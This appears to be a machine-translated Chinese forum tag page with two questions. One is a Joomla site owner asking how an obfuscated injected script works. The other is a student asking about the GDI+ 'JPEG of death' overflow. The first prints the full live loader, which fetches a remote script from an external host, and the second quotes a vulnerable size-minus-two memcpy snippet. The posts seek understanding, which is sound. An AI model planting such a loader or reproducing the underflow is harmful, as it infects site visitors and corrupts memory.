Tag: 恶意软件

这个混乱如何工作?

我的Joomla! 网站已被多次入侵。 有人,不知何故,设法注入下面的垃圾到关键的PHP脚本,但我的意思是不谈论configurationJoomla。 该网站访问量不大(有时我担心我可能是该网站的唯一访问者…),我不关心网站备份和运行。 我会最终处理的。 我的问题是,这个垃圾如何工作? 我看着它,我只是不知道这是如何做到有害的? 它试图下载一个名为ChangeLog.pdf的PDF文件,该文件感染了木马,打开后会冻结Acrobat,并在您的机器上造成严重破坏。 它怎么做,我不知道,我不在乎。 但是下面这段脚本是如何调用下载的? <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!–6f471c20c9b96fed179c85ffdd3365cf–> ESET已将此代码检测为JS / TrojanDownloader.Agent.NRO木马

死亡的JPEG如何运行?

我一直在阅读关于针对Windows XP和Windows Server 2003上的GDI +的老版本攻击,这些攻击称为我正在进行的项目的死亡JPEG。 这个漏洞在下面的链接中得到很好的解释: http : //www.infosecwriters.com/text_resources/pdf/JPEG.pdf 基本上,一个JPEG文件包含一个称为COM的部分,其中包含一个(可能是空的)注释字段和一个包含COM大小的两个字节的值。 如果没有注释,则大小为2.读取器(GDI +)读取大小,减去两个大小,然后分配适当大小的缓冲区以复制堆中的注释。 攻击涉及在该字段中设置值0 。 GDI +减2 ,导致值为-2 (0xFFFe) ,由memcpy转换为无符号整数0XFFFFFFFE 。 示例代码: unsigned int size; size = len – 2; char *comment = (char *)malloc(size + 1); memcpy(comment, src, size); 注意到第三行的malloc(0)应该返回一个指向堆中未分配内存的指针。 如何写0XFFFFFFFE字节( 4GB !!!!)可能不会崩溃程序? 这是否超出堆区,并进入其他程序和操作系统的空间? 那会发生什么? 正如我所了解的memcpy ,它只是从目的地复制n字符到源。 在这种情况下,源应该在栈上,堆上的目的地, n是4GB 。